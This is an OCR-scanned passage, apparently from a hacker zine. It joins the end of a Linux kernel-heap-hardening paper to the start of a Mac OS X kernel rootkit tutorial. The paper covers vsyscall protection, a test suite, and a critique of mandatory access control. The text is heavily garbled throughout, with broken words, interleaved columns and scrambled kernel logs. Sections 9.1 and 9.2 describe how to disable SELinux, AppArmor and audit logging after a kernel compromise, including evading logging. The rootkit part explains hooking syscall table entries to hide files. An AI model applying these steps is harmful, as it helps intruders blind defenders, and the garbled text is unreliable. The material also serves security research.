effectiveness of this approach is orthogonal to the deployment of other 
measures, to prevent potential corner cases and rare situations useful 
for an attacker to bypass the safety checks. 


The current kernel heap allocators (including SLOB) provide a function 
to retrieve the size of a slab object, as well as testing the validity 
of a pointer to see if it’s within the known caches (excluding SLOB 
which required this function to be written since it’s essentially a 
no-op in upstream sources). These functions are ksize() and 
kmem_validate_ptr() respectively (in each pertinent allocator source: 
mm/slab.c, mm/slub.c and mm/slob.c). 


In order to detect whether a buffer is stack or heap based in the 
kernel, the object_is_on_stack() function (from include/linux/sched.h) 
can be used. The drawback of these functions is the computational cost 
of looking up the page where this buffer is located, checking its 
validity wherever applicable (in the case of kmem_validate_ptr() this 
involves validating against a known cache) and performing other tasks 
to determine the validity and properties of the buffer. Nonetheless, 
the performance impact might be negligible and reasonable for the 
additional assurance provided with these changes. 
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Brad Spengler devised this idea, developed and introduced the checks 
into the latest test patches as of April 27th (test10 to test11l from 
PaX and the grsecurity counterparts for the current kernel stable 
release, 2.0.29: 1)= 


A reliable method to detect stack-based objects is still being 
considered for implementation, and might require access to meta-data 
used for debuggers or future GCC built-ins. 


ae la [ 7. Prevention of vsyscall overwrites on x86_64 


This technique is used in sgrakkyu’s exploit for CVE-2009-0065. It 
involves overwriting a x86_64 specific location within a top memory 
allocated page, containing the vsyscall mapping. This mapping is used 
to implement a high performance entry point for the gettimeofday () 
system call, and other functionality. 


An attacker can target this mapping by means of an arbitrary write-N 
primitive and overwrite the machine instructions there to produce a 
reliable return vector, for both remote and local attacks. For remote 
attacks the attacker will likely use an offset-aware approach for 
reliability, but locally it can be used to execute an offset-less 
attack, and force the kernel into dereferencing userland memory. This 
is problematic since presently PaX does not support UDEREF on x86_64 
and the performance cost of its implementation could be significant, 
making abuse a safe bet even against hardened environments. 


Therefore, contrary to past popular belief, x86_64 systems are more 
exposed than i386 in this regard. 


During conversations with the PaX Team, some difficulties came to 
attention regarding potential approaches to deter this technique: 


1. Modifying the location of the vsyscall mapping will break 
compatibility. Thus, glibc and other userland software would 
require further changes. See arch/x86/kernel/vmlinux_64.lds.s 
and arch/x86/kernel/vsyscall_64.c 


2. The vsyscall page is defined within the ld linked script for 
x86_64 (arch/x86/kernel/vmlinux_64.1lds.S). It is defined by 
default (as of 2.6.29.3) within the boundaries of the .data 
section, thus writable for the kernel. The userland mapping 
is read-execute only. 


3. Removing vsyscall support might have a large performance impact 
on applications making extensive use of gettimeofday(). 


4. Some data has to be written in this region, therefore it can’t 
be permanently read-only. 


PaX provides a write-protect mechanism used by KERNEXEC, together with 
its definition for an actual working read-only .rodata implementation. 
Moving the vsyscall within the .rodata section provides reliable 
protection against this technique. In order to prevent sections from 
overlapping, some changes had to be introduced, since the section has 
to be aligned to page size. In non-PaX kernels, .rodata is only 
protected if the CONFIG_DEBUG_RODATA option is enabled. 


The PaX Team solved {4} using pax_open_kernel() and pax_close_kernel () 
to allow writes temporarily. This has some performance impact but is 
most likely far lower than removing vsyscall support completely. 


This deters abuse of the vsyscall page on x86_64, and prevents 
offset-—based remote and offset-less local exploits from leveraging a 
reliable attack against a kernel vulnerability. Nonetheless, protection 
against this venue of attack is still work in progress. 


Short 
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ly after the 


i 


Developing the right regression testsuite for KI! 


nitial 


development process started, 


21 


ERNH 


EAP 


it became 


evident that a decent set of regression tests was required to check if 


the implementation worked as 
modules for each test was a straightforward solution, 
l tool to perform thorough testing seemed the most logical 


havin 
appro 


Hence 


g a real 
ach. 


KHTEST 


i 


has been developed. 


xpected. While using single loadable 


in the longterm, 


It’s composed of a kernel module 


which communicates to a userland Python program over Netlink sockets. 


The c 
comma 
userl 


types API is used to handle the low level structures that define 
nds and replies. The kernel modul xposes internal APIs to the 
and process, such as: 

kmalloc 

kfree 


memset and memcpy 
copy_to_user and copy_from_user 


Using this interface, 
of testcases: 
= KernHeapTes 
addr = e.kmal 
e.kfree (addr) 
e.kfree (addr) 


When this test runs on an unprotected 2.6.29.2 system 
debugging capabilities 
observed in the kernel message buffer, 


alloc 


reapi 


K 


ator, 


ter () 


lloc(size) 


allocation and releas 
controlled with a simple Python script, 


of kernel memory can be 
allowing efficient development 


(SLAB as 
nabled) the following output can be 


ng: 


ERNH 


BAP test-suit 
run_cmd_kmalloc: 


run_cmd_kfree: 
run_cmd_kfree: 


s 
P 
C 


id: 3726, 

all Trace: 
<c0889a81> 
<c088aee9> 
<e082f25c> 
<c088bal4> 
<e082f25c> 


] 
] 
] 
] 
] 


comm : 


kmal 


with a subsequent BUG on cache 


loaded. 
lloc (64, 
kfree (OxDF1B 
kfree (OxDF1B 
lab error in verify_redzone_free(): 
python Not tainted 2.6.29.2-grsec #1 


returned OxDF1B 


000000b0) EC30 
EC30) 


EC30) 


cache ‘size-64’: double fr detected 


__slab_error+0Oxla/0Oxlc 


cach 
? run_cmd_kfreet0xle/0x23 


_free_d 


bugcheck+0x137/0x1f£5 
[kernheap_test] 


k£reet0x9d/0xd2 
run_cmd_kfree+0xle/0x23 


kernel BUG at mm/slab.c:2720! 
invalid opcode: 


last sysfs file: 
comm: 
0060: [<c0O88ac00> 
is at slab_put_obj+0x59/0x75 
EBX: df] 
EDI: 


DP 
E 
aut 
im 
ry 
im 
Py 
im 
ry 


D 


S) 


€ 


EIP 
BAX: 
ESI: 


id: 
TP. 


10, 


O000004F 
00000021 


S: 0068 ES: 


tack: 


00 


Process events/0 


0000 [#1] 


SMP 


/sys/kern 


events/0 Not tainted 
EFLAGS: 


68 FS: 
(pid: 


00d8 
10, 


lbe000 
dflbec28 


1/uevent_seqnum 
(2.6.29.2-grsec #1) 
U: 0 


VMware Virtual Platform 
00010092 CP 


ECX: c0828819 EDX: 
EBP: dfb3deb8 ESP: 
GS: 0000 SS: 0068 

ti=dfb3c000 task=dfb3ae30 task.ti=dfb3c000) 


c197c000 
dfb3de9c 


cObc24ee cObclfd7 dflbec28 df800040 dflbe000 df8065e8 df800040 dfb3dee0 
c088b42d 00000000 dflbec28 00000000 00000001 df809db4 df809db4 00000001 
d£809d80 dfb3df00 cO088be34 00000000 df8065e8 df800040 df8065e8 df£800040 


all Trace: 

[<c0O88b42d> 
<c088be34> 
<c088beba> 
<c083586a> 
<c088be5c> 
<c0838593> 


a See 


[ 
[ 
[ 
[ 
[ 


2 


VIN DN 1 


free_block4 


+0x98/0x103 


drain_array+0x85/0xad 


cache_reap 


Ox5e/0xf 


run_workqueue+0xc4/0x18c 


cache_reap+4 


t+Ox0/Oxfe 


kthread+0x0/0x59 
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[<c0803717>] ? kernel_thread_helpert+0x7/0x10 


The following code presents a more complex test to evaluate a 
double-free situation which will put a random kmalloc cache into an 
unpredictable state: 


= KernHeapTester () 
addrs = [] 
kmalloc_sizes = [| 32, 64, 96, 128, 196, 256, 1024, 2048, 4096] 
i = 0 
while i < 1024: 


addr = e.kmalloc(random. choice (kmalloc_sizes) ) 
addrs.append (addr) 
i+= 1 


random.seed(os.urandom (32) ) 
random. shuffle (addrs) 

e.kfree (random.choice (addrs) ) 
random. shuffle (addrs) 


for addr in addrs: 
e.kfree (addr) 


On a KERNHEAP protected host: 


FAP: Invalid kfree() in (objp 
UID:0 


Kernel panic - not syncing: KERN 
df£38e000) by python:3643, UID:0 


fo 


The testsuite sources (including both the Python module and the LKM for 
the 2.6 series, tested with 2.6.29) are included along this paper. 
Adding support for new kernel APIs should be a trivial task, requiring 
only modification of the packet handler and the appropriate addition of 
a new command structure. Potential improvements include the use of a 
shared memory page instead of Netlink responses, to avoid impacting the 
allocator state or conflict with our tests. 


------ 9. The Inevitability of Failure 


In 1998, members (Loscocco, Smalley et. al) of the Information Assurance 
Group at the NSA published a paper titled "The Inevitability of Failure: 
The Flawed Assumption of Security in Modern Computing Environments" 

12]. 


The paper explains how modern computing systems lacked the necessary 
features and capabilities for providing true assurance, to prevent 
compromise of the information contained in them. As systems were 
becoming more and more connected to networks, which were growing 
exponentially, the exposure of these systems grew proportionally. 
Therefore, the state of art in security had to progress in a similar 
pace. 


From an academic standpoint, it is interesting to observe that more 
than 10 years later, the state of art in security hasn’t evolved 
dramatically, but threats have gone well beyond the initial 
expectations. 


"Although public awareness of the need for security 

in computing systems is growing rapidly, current 

efforts to provide security are unlikely to succeed. 
Current security efforts suffer from the flawed 
assumption that adequate security can be provided in 
applications with the existing security mechanisms of 
mainstream operating systems. In reality, the need for 
secure operating systems is growing in today’s computing 
environment due to substantial increases in 

connectivity and data sharing." Page 1, [12] 
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Most of the authors of this paper were involved in the development of 
the Flux Advanced Security Kernel (FLASK), at the University of Utah. 
Flask itself has its roots in an original joint project of the then 
known as Secure Computing Corporation (SCC) (acquired by McAfee in 
2008) and the National Security Agency, in 1992 and 1993, the 
Distributed Trusted Operating System (DTOS). DTOS inherited the 
development and design ideas of a previous project named DTMach 


(Distributed Trusted Match) which aimed to introduce a flexible access 
control framework into the GNU Mach microkernel. Type Enforcement was 
first introduced in DTMach, superseded in Flask with a more flexible 


design which allowed far greater granularity (supporting mixing of 
different types of labels, beyond only types, such as sensitivity, 
roles and domains). 


Type Enforcement is a simple concept: a Mandatory Access Control (MAC) 
takes precedence over a Discretionary Access Control (DAC) to contain 
subjects (processes, users) from accessing or manipulating objects 
(files, sockets, directories), based on the decision made by the 
security system upon a policy and subject’s attached security context. 
A subject can undergo a transition from one security context to another 
(for example, due to role change) if it’s explicitly allowed by the 
policy. This design allows fine-grained, albeit complex, decision 
making. 


Essentially, MAC means that everything is forbidden unless explicitly 
allowed by a policy. Moreover, the MAC framework is fully integrated 
into the system internals in order to catch every possible data access 
situation and store state information. 


The true benefits of these systems could be exercised mostly in 
military or government environments, where models such as Multi-Level 
Security (MLS) are far more applicable than for the general public. 


Flask was implemented in the Fluke research operating system (using the 
OSKit framework) and ultimately lead to the development of SELinux, a 
modification of the Linux kernel, initially standalone and ported 
afterwards to use the Linux Security Modules (LSM) framework when its 
inclusion into mainline was rejected by Linus Tordvals. Flask is also 
the basis for TrustedBSD and OpenSolaris FMAC. Apple’s XNU kernel, 
albeit being largely based off FreeBSD (which includes TrustedBSD 
modifications since 6.0) decided to implement its own security 
mechanism (non-MAC) known as Seatbelt, with its own policy language. 


While the development of these systems represents a significant step 
towards more secure operating systems, without doubt, the real-world 
perspective is of a slightly more bleak nature. These systems have 
steep learning curves (their policy languages are powerful but complex, 
their nature is intrinsically complicated and there’s little freely 
available support for them, plus the communities dedicated to them are 
fairly small and generally oriented towards development), impose strict 
restrictions to the system and applications, and in several cases, 
might be overkill to the average user or administrator. 


A security system which requires (expensive, length) specialized 
training is dramatically prone to being disabled by most of its 
potential users. This is the reality of SELinux in Fedora and other 
systems. The default policies aren’t realistic and users will need to 
write their own modules if they want to use custom software. In 
addition, the solution to this problem was less then suboptimal: the 
targeted (now modular) policy was born. 


The SELinux targeted policy (used by default in Fedora 10) is 
essentially a contradiction of the premises of MAC altogether. Most 
applications run under the unconfined_t domain, while a small set of 
daemons and other tools run confined under their own domains. While 
this allows basic, usable security to be deployed (on a related note, 
XNU Seatbelt follows a similar approach, although unsuccessfully), its 
effectiveness to stop determined attackers is doubtful. 
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For instance, the Apache web server daemon (httpd) runs under the 
httpd_t domain, and is allowed to access only those files labeled with 
the httpd_sys_content_t type. In a PHP local file include scenario this 
will prevent an attacker from loading system configuration files, but 
won’t prevent him from reading passwords from a PHP configuration file 
which could provide credentials to connect to the back-end database 
server, and further compromise the system by obtaining any access 
information stored there. In a relatively more complex scenario, a PHP 
code execution vulnerability could be leveraged to access the apache 
process file descriptors, and perhaps abuse a vulnerability to leak 
memory or inject code to intercept requests. Either way, if an attacker 
obtains unconfined_t access, it’s a game over situation. This is 
acknowledged in [13], along an interesting citation about the managerial 
decisions that lead to the targeted policy being developed: 


"SELinux can not cause the phones to ring" 
"SELinux can not cause our support costs to rise." 
Strict Policy Problems, slide 5. [13] 


= 
ry 
a2 
alt 


---[ 9.1 Subverting SELinux and the audit subsystem 


Fedora comes with SELinux enabled by default, using the targeted 
policy. In remote and local kernel exploitation scenarios, disabling 
SELinux and the audit framework is desirable, or outright necessary if 
MLS or more restrictive policies are used. 


In March 2007, Brad Spengler sent a message to a public mailing-list, 
announcing the availability of an exploit abusing a kernel NULL pointer 
dereferenc (more specifically, an offset from NULL) which disabled all 
LSM modules atomically, including SELinux. tee42-24tee.c exploited a 
vulnerability in the tee() system call, which was silently fixed by 
Jens Axboe from SUSE (as "[patch 25/45] splice: fix problems with 
sys_tee()"). 


Its approach to disable SELinux locally was extremely reliabl and 
Simplistic at the same. Once the kernel continues execution at the code 
in userland, using shellcode is unnecessary. This applies only to local 
exploits normally, and allows offset-less exploitation, resulting in 
greater reliability. All the LSM disabling logic in tee42-24tee.c is 
written in C which can be easily integrated in other local exploits. 


The disable_selinux() function has two different stages independent 
of each other. The first finds the selinux_enabled 32-bit integer, 


through a linear memory search that seeks for a cmp opcode within the 
selinux_ctxid_to_string() function (defined in selinux/exports.c and 
present only in older kernels). In current kernels, a suitable 


replacement is the selinux_string_to_sid() function. 


Once the address to selinux_enabled is found, its value is set to zero. 
this is the first step towards disabling SELinux. Currently, additional 
targets should be selinux_enforcing (to disable enforcement mode) and 
selinux_mls_enabled. 


The next step is the atomic disabling of all LSM modules. This stage 
also relies on an finding an old function of the LSM framework, 
unregister_security(), which replaced the security_ops with 
dummy_security_ops (a set of default hooks that perform simple DAC 
without any further checks), given that the current security_ops 
matched the ops parameter. 


This function has disappeared in current kernels, but setting the 
security_ops to default_security_ops achieves the sam ffect, and it 
should be reasonably easy to find another function to use as referenc 
in the memory search. This change was likely part of the facelift that 
LSM underwent to remove the possibility of using the framework in 
loadable kernel modules. 
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With proper fine-tuning and changes to perform additional opcode 
checks, recent kernels should be as easy to write a SELinux/LSM 
disabling functionality that works across different architectures. 


For remote exploitation, a typical offset-based approach like that used 
in sgraykku’s sctp_houdini.c exploit (against x86_64) should be reliable 
and painless. Simply write a zero value to selinux_enforcing, 
selinux_enabled and selinux_mls_enabled (albeit the first is well 
enough). Further more, if we already know the address of security_ops 
and default_security_ops, we can disable LSMs altogether that way too. 


If an attacker has enough permissions to control a SCTP listener or run 
his own, then remote exploitation on x86_64 platforms can be made 
completely reliable against unknown kernels through the use of the 
vsyscall exploitation technique, to return control to the attacker 
controller listener in a previous mapped -fixed- address of his choice. 
In this scenario, offset-less SELinux/LSM disabling functionality can 
be used. 


Fortunately, this isn’t even necessary since most Linux distributions 
still ship with world-readable /boot mount points, and their package 
managers don’t do anything to solve this when new kernel packages are 
installed: 


Ubuntu 8.04 (Hardy Heron) 


-rw-r--r-- 1 root 413K /boot/abi-2.6.24-24-generic 

-rw-r--r-- 1 root 79K /boot/config-2.6.24-24-generic 

-rw-r--r-- 1 root 8.0M /boot/initrd.img-2.6.24-24-generic 

-rw-r--r-- 1 root 885K /boot/System.map-2.6.24-24-generic 

-rw-r--r-- 1 root 62M /boot/vmlinux-debug-2.6.24-24-generic 
-rw-r--r-- 1 root 1.9M /boot/vmlinuz-2.6.24-24-generic 

Fedora release 10 (Cambridge) 

-rw-r--r-- 1 root 84K /boot/config-2.6.27.21-170.2.56.fcl1l0.x86_64 
-r~w------- 1 root 3.5M /boot/initrd-2.6.27.21-170.2.56.fc10.x86_64.img 
-rw-r--r-- 1 root 1.4M /boot/System.map-2.6.27.21-170.2.56.fc10.x86_64 
-rwxr-xr-x 1 root 2.6M /boot/vmlinuz-2.6.27.21-170.2.56.fcl10.x86_64 


Perhaps, one easy step before including complex MAC policy based 
security frameworks, would be to learn how to use DAC properly. Contact 
your nearest distribution security officer for more information. 


---[ 9.2 Subverting AppArmor 


Ubuntu and SUSE decided to bundle AppArmor (aka SubDomain) instead 
(Novell acquired Immunix in May 2005, only to lay off their developers 
in September 2007, leaving AppArmor development "open for the 
community"). AppArmor is completely different than SELinux in both 
design and implementation. 


It uses pathname based security, instead of using filesystem object 
labeling. This represents a significant security drawback itself, since 
different policies can apply to the same object when it’s accessed by 
different names. For example, through a symlink. In other words, the 
security decision making logic can be forced into using a less secure 
policy by accessing the object through a pathname that matches to an 
existent policy. It’s been argued that labeling-based approaches are 
due to requirements of secrecy and information containment, but in 
practice, security itself equals to information containment. 
Theory-related discussions aside, this section will provide a basic 
overview on how AppArmor policy enforcement works, and some techniques 
that might be suitable in local and remote exploitation scenarios to 
disable it. 


The most simple method to disable AppArmor is to target the 32-bit 
integers used to determine if it’s initialized or enabled. In case 
the system being targeted runs a stock kernel, the task of accessing 
these symbols is trivial, although an offset-dependent exploit is 
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certainly suboptimal: 


cO03fa7ac D apparmorfs_profiles_op 
c03fa7cO D apparmor_path_max 
(Determines the maximum length of paths before access is rejected 
by default) 
c03fa7c4 D apparmor_enabled 


(Determines if AppArmor is currently enabled used on runtime) 
c04eb918 B apparmor_initialized 


(Determines if AppArmor was enabled on boot time) 


c04eb91lc B apparmor_complain 
(The equivalent to SELinux permissiv 


mode, no enforcement) 


c04eb924 B apparmor_audit 
(Determines if the audit subsystem will be used to log messages) 


c04eb928 B apparmor_logsyscall 
(Determines if system call logging is 


nabled 


used on runtime) 


A NULL-write primitive suffices to overwrite th 
integers. But for local or shellcode based exploitation, a function 
exists that can disable AppArmor on runtime, apparmor_disable(). This 
function is straightforward and reasonably easy to fingerprint: 


values of any of those 


Oxc0O200e60 mov eax, OxcO03fad54 


Oxc0200e65 call OxcO031lbcd0 <mutex_lock> 

Oxc0200e6a call 0xc0200110 <aa_profile_ns_list_release> 
OxcO0200e6f call OxcO1ff260 <free_default_namespace> 
Oxc0200e74 call Oxc013e910 <synchronize_rcu> 

Oxc0200e79 call Oxc0201c30 <destroy_apparmorfs> 
Oxc0O200e7e mov eax, OxcO03fad54 

Oxc0200e83 call OxcO031bc80 <mutex_unlock> 

Oxc0O200e88 mov eax, 0Oxc03bbal3 

Oxc0200e8d mov DWORD PTR ds:0xc04eb918, 0x0 

Oxc0200e97 jmp Oxc0200df0 <info_message> 


It sets a lock to prevent modifications to the profile list, and 
releases it. Afterwards, it unloads the apparmorfs and releases the 
lock, resetting the apparmor_initialized variable. This method is 

not stealth by any means. A message will be printed to the kernel 
message buffer notifying that AppArmor has been unloaded and the lack 
of the apparmor directory within /sys/kernel (or the mount-point of the 
sysfs) can be easily observed. 

The apparmor_audit variable should be preferably reset to turn off 
logging to the audit subsystem (which can be disabled itself as 
explained in the previous section). 


Both AppArmor and SELinux should be disabled together with their 
logging facilities, since disabling enforcement alone will turn off 
their effective restrictions, but denied operations will still get 
recorded. Therefore, it’s recommended to reset apparmor_logsyscall, 
apparmor_audit, apparmor_enabled and apparmor_complain altogether. 


Another viable option, albeit slightly more complex, is to target the 
internals of AppArmor, more specifically, the profile list. The main 
data structure related to profiles in AppArmor is ‘’aa_profile’ (defined 
in apparmor.h): 


struct aa_profile { 
char *name; 
struct list_head list; 
struct aa_namespace *ns; 


int exec_table_size; 
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char **exec_table; 
struct aa_dfa *file_rules; 
struct { 
int hat; 
int complain; 
int audit; 
} flags; 
int isstale; 


kernel_cap_t set_caps; 
kernel_cap_t capabilities; 
kernel_cap_t audit_caps; 
kernel_cap_t quiet_caps; 


struct aa_rlimit rlimits; 
unsigned int task_count; 


struct kref count; 

struct list_head task_contexts; 
spinlock_t lock; 

unsigned long int_flags; 

ul6 network families [AF_MAX]; 
ul6 audit_network [AF_MAX]; 

ul6 quiet_network [AF_MAX]; 


}; 


The definition in the header file is well commented, thus we will look 
only at the interesting fields from an attacker’s perspective. Th 
flags structure contains relevant fields: 


1. audit: checked by the PROFILE_AUDIT macro, used to determine if 
an event shall be passed to the audit subsystem. 


2. hat: checked by the PROFILE_IS_HAT macro, used to determine if 
this profile is a subprofile (’hat’). 


Gl 


3. complain: checked by the PROFILE_COMPLAIN macro, used to 
determine if this profile is in complain/non-enforcement mode 
(for example in aa_audit(), from main.c). Events are logged but 
no policy is enforced. 


From the flags, the immediately useful ones are audit and complain, but 
the hat flag is interesting nonetheless. AppArmor supports ‘hats’, 
being subprofiles which are used for transitions from a different 
profile to enable different permissions for the same subject. A 
subprofile belongs to a profile and has its hat flag set. This is worth 
looking at if, for example, altering the hat flag leads to a subprofile 
being handled differently (ex. it remains set despite the normal 
behavior would be to fall back to the original profile). Investigating 
this possibility in depth is out of the scope of this article. 


The task_contexts holds a list of the tasks confined by the profile 
(the number of tasks is stored in task_count). This is an interesting 
target for overwrites, and a look at the aa_unconfine_tasks() function 
shows the logic to unconfine all tasks associated for a given profile. 
The change itself is done by aa_change_task_context() with NULL 
parameters. Each task has an associated context (struct 
aa_task_context) which contains references to the applied profile, the 
magic cookie, the previous profile, its task struct and other 
information. The task context is retrieved using an inlined function: 


static inline struct aa_task_context 
*aa_task_context (struct task_struct *task) 


{ 


return (struct aa_task_context *) rcu_dereference(task->security) ; 


} 


And after this dissertation on AppArmor internals, the long awaited 
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method to unconfine tasks is unfold: set task->security to NULL. It’s 
that simple, but it would have been unfair to provide the answer 
without a little analytical effort. It should be noted that this method 
likely works for most LSM based solutions, unless they specifically 
handle the case of a NULL security context with a denial response. 


The serialized profiles passed to the kernel are unpacked by the 
aa_unpack_profile() function (defined in module_interface.c). 


Finally, these structures are allocated within one of the standard kmem 
caches, via kmalloc. AppArmor does not use a private cache, therefor 
it is feasible to reach these structures in a slab overflow scenario. 


The approach to abuse AppArmor isn’t really different from that of any 
other kernel security frameworks, technical details aside. 
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—----- [ 11. Thanks and final statements 


"For there is nothing hid, which shall not be manifested; neither was 
any thing kept secret, but that it should come abroad." 
Mark IV:XXII 


The research and work for KERNHEAP has been conducted by Larry 
Highsmith of Subreption LLC. Thanks to Brad Spengler, for his 
contributions to the otherwise collapsing Linux security in the past 
decade, the PaX Team (for the same reason, and their behind-th 
iron-curtain support, technical acumen and patience). Thanks to the 
editorial staff, for letting me publish this work in a convenient 
technical channel away of the encumbrances and distractions present in 
other forums, where facts and truth can’t b xpressed non-distilled, 
for those morally obligated to do so. Thanks to sgrakkyu for his 
feedback, attitude and technical discussions on kernel exploitation. 


he decision of SUSE and Canonical to choose AppArmor over more 
omplete solutions like grsecurity will clearly take a toll in its 
ecurity in the long term. This applies to Fedora and Red Hat 
nterprise Linux, albeit SELinux is well suited for federal customers, 
hich are a relevant part of their user base. The problem, though, is 
he inability of SELinux to contemplate kernel vulnerabilities in its 
hreat model, and the lack of sound and well informed interest on 
developing such protections from the side of the Linux kernel 
developers. Hopefully, as time passes on and the current maintainers 
grow older, younger developers will come to replace them in their 
management roles. If they get over past mistakes and don’t inherit old 
grudges and conflicts of interest, there’s hope the Linux kernel will 
be more receptive to security patches which actually provide effective 
protections, for the benefit of the whole community. 


ttztWnay 


Paraphrasing the last words of a character from an Alexandre Dumas 
novel: until the future deigns to reveal the fate of Linux security 
to us, all wisdom can be summed up in these two words: Wait and hope. 


Last but not least, It should be noted that currently no true mechanism 
exists to enforce kernel security protections, and thus, KERNHEAP and 
grsecurity could also fall prey to more or less realistic attacks. The 
requirements to do this go beyond the capabilities of currently 
available hardware, and Trusted Computing seems to be taking a more 
DRM-oriented direction, which serves some commercial interests well, 
but leaves security lagging behind for another ten years. 


We present the next kernel security technology from yesterday, to be 
found independently implemented by OpenBSD, Red Hat, Microsoft or all 
of them at once, tomorrow. 


"And ye shall know the truth, and the truth shall make you free." 
John VIII:XXxXII 
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[ Developing Mac OSX kernel rootkits ] 
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--[ 1 - Introduction 


-[{ 1.1 - Background 


Rootkits for different operating systems have been around for many years. 
Linux, Windows, and the different *BSD-flavors have all had their fair 
share of rootkits. Kernel rootkits are just a continuation of the standard 
file-swapping rootkits of days past. The dawn of tools like Osiris and 
Tripwire forced coders seeking to subvert the operating system to take 
refuge in kernelspac 


The basic idea of a rootkit is to change the behavior and output of 
standard commands and tools to hide the presence of backdoors, sniffers 
and other types of malicious code. And just as within other parts of the 
security industry it is a continuing arms race between those who seek to 
subvert the kernel and those who seek to protect it. 


In this article we will describe the basics of runtime kernel patching and 
kernel rootkits for the Mac OS X operating system and how to develop your 
own. It is intended as an entry level tutorial for beginners and as well 
as guide for those interested in adapting existing kernel rootkits from 
other operating systems to Mac OS X. Apple supports two CPU architectures 
for the Mac OS X operating system: Intel and PowerPC. We believe that this 
guide is architecture neutral and that most of the source code is 
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compatible with both architectures. 
-[{ 1.2 - Rootkit basics 


The purpose of a rootkit is to hide the presence of an intruder and his 
tools. In order to do this the most common features of a kernel rootkit is 
the ability to hide files, processes and network sockets. More advanced 
rootkits sometimes provide backdoors and keyboard sniffers. 


When a program such as ’/bin/ls’ is run to lists the files and folders of 
a directory it calls a function in the kernel called a syscall. The 
syscall is invoked from userland and transfers control from the userland 
process to the kernelspace function getdirentries(). The getdirentries () 
function returns a list of files for the specified directory to the 
userland process that in return displays the list to the user. 


In order to hide the presence of a specific file the data returned from 
the getdirentires() syscall needs to be modified and the entry for the 
file deleted before returning the data to the user. This can be 
accomplished in a number of different ways; one way is to modify the 
filesystem processing layer (VFS) and another is to directly modify the 
getdirentires() function. In this brief introduction we will take the 
easy route and modify the getdirentries() function. 


-[{ 1.3 - Syscall basics 


When a userland process needs to call a kernel function it invokes a 
syscall. A syscall is an API function that provides access to services 
provided by the kernel such as reading or writing to files, listing files 
i 

n 


n directories or opening and closing network sockets. Each syscall has a 
umber, and all syscalls are invoked referencing this syscall number. 


When a userland process wants to invoke a kernel function it is almost 
always done through a wrapper function in the libc-library that in turn 
generates a software interrupt that transfers control from the userland 
process in to the kernel. The kernel stores a list of all available 
syscall functions in a table called the sysentry table, each entry has a 
function pointer to the location of the function for that syscall number. 


The kernel looks up the syscall that the userland process wants to call in 
the syscall entry table and invokes that function to handle the request. 

A list of the available syscalls as well as their numbers can be found in 
/usr/include/sys/syscall.h. For example, syscalls of interest to a rootkit 
wanting to hide files are: 


196 - SYS_getdirentries 
222 - SYS_getdirentriesattr 
344 -— SYS_getdirentries64 


Each of these entries in the table points to the function in the kernel 
responsible for returning a list of files. SYS_getdirentries is an older 
version of the function, SYS_getdirentriesattr is a similar version of 
with support for OS X specific attributes. SYS_getdirentries64 is a newer 
version that supports longer filenames. SYS_getdirentries is used by for 
example bash, SYS_getdirentries64 is used by the ls command and 
SYS_getdirentriesattr is used by pure OS X-integrated applications like 
the Finder. Each of these functions needs to be replaced in order to 
provide a seamless ‘’experience’ for the end-user. 


In order to modify the output of the function a wrapper function needs to 
be created that can replace the original function. The wrapper function 
will first call the original function, search the output and do the 
required censoring before returning the sanitized data to the userland 
process. 


-[ 1.4 - Userspace and Kernelspace 


The kernel runs in a separate memory space that is private to the kernel 


16.txt Wed Apr 26 09:43:46 2017 3 


in the same way as each user process has it’s own private memory. This 
means that is is not possible to just read and write freely memory from 
the kernel. Whenever the kernel needs to modify memory in user-space, for 
instance copy data to or from userspace, specific routines and protocols 
needs to followed. A number of help functions are provided for this 
specific task, most notably copyin(9) and copyout (9). More information 
about these functions can be found in the manpages for copy(9) and 
store(9). 


--[ 2 - Introducing the XNU kernel 


XNU, the Mac OS X kernel and it’s core is based on the Mach micro kernel 
and FreeBSD 5. The Mach layer is responsible for kernel threads, 
processes, pr mptive multitasking, message-passing, virtual memory 
management and console i/o. Above the Mach layer is the BSD layer that 
supplies the POSIX API, networking and filesystems amongst other things. 
The XNU kernel also has an object oriented device driver framework known 
as the I/O Kit. This mashup of different technologies provide several 
different ways to accomplish the same task; to modify the running kernel. 
Another interesting choice in the design of the XNU kernel is that both 
the kernel- and userland has their own 4gb address space. 


-[ 2.1 - OS X kernel rootkit history 


One of the first publicly released Mac OS X kernel rootkits were WeaponxX 
[9] which is developed by nemo [5] and was released in November 2004. It 
is based on the same kernel extension (loadable kernel module) technique 
that most kernel rootkits use and provides th xpected basic 
£ 
n 
c 


unctionality of a kernel rootkit. WeaponX [9] does however not work on 
ewer versions of the Mac OS X operating system due to major kernel 
hanges. 


In the latest few releases of Mac OS X Apple has done a couple things 
hardening the kernel and making it more difficult to subvert. Of 
particular interest is the fact that it no longer exports the sysentry 
table and that several of the key kernel structures are opaque and hidden 
from kernel developers. 


-[ 2.2 - Finding the syscall entry table 


As of OS X version 10.4 the sysentry table is no longer an exported symbol 
from the kernel. This means that the compiler will not be able to 
automatically identify the position in memory where the sysentry table is 
stored. This can either be solved by searching the memory for an 
appropriate looking table or using something else as a reference. Landon 
Fuller identified that the exported symbol nsysent (the number of entries 
in the sysentry table) is stored in close proximity to the sysentry table. 
He also wrote a small routine that finds the sysentry table and returns a 
pointer to it that can be used to manipulate the table as one see fit [1]. 


The sysent structure is defined like this: 


struct sysent { 


intl6_t sy_narg; /* number of arguments */ 

int8_t reserved; /* unused value */ 

int8_t sy_flags; /* call flags */ 

sy_call_t *sy_call; /* implementing function */ 

sy_munge_t *sy_arg_munge32;/* munge system call arguments for 
32-bit processes */ 

sy_munge_t *sy_arg_munge64;/* munge system call arguments for 
64-bit processes */ 

int32_t sy_return_type; /* return type */ 

uintl6_t sy_arg_bytes; /* The size of all arguments for 


32-bit system calls, in bytes */ 
} * sysent; 
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The most interesting part of the structure is the "sy_call" pointer, which 
is a pointer to the actual syscall handler function. Thats the function we 
want our rootkit to hook. Hooking the function is as easy as changing the 
value of the pointer to point at our own function somewhere in memory. 


-[ 2.3 - Opaque kernel structures 


With OS X version 10.4 Apple also changed the kernel structure in order to 
provide a more stable kernel API. This was done to ensure that kernel 
extensions doesn’t break when internal kernel structures change. This 
involves hiding large parts of the internal structures behind API:s and 
only exporting chosen parts of the structures to developers. 


A good example of this is the process structure called "proc". Which is 
available from both userland and kernelland. The userland version is 
defined in /usr/include/sys/proc.h and looks like this: 


struct extern_proc { 


union { 
struct { 
struct proc *__p _forw; /* Doubly-linked run/sleep queue. 
struct proc *__p_back; 
} p_stl; 
struct timeval __p_starttime; /* process start time */ 
} pun; 


define p_forw p_un.p_stl.__p_forw 
define p_back p_un.p_stl.__p_back 
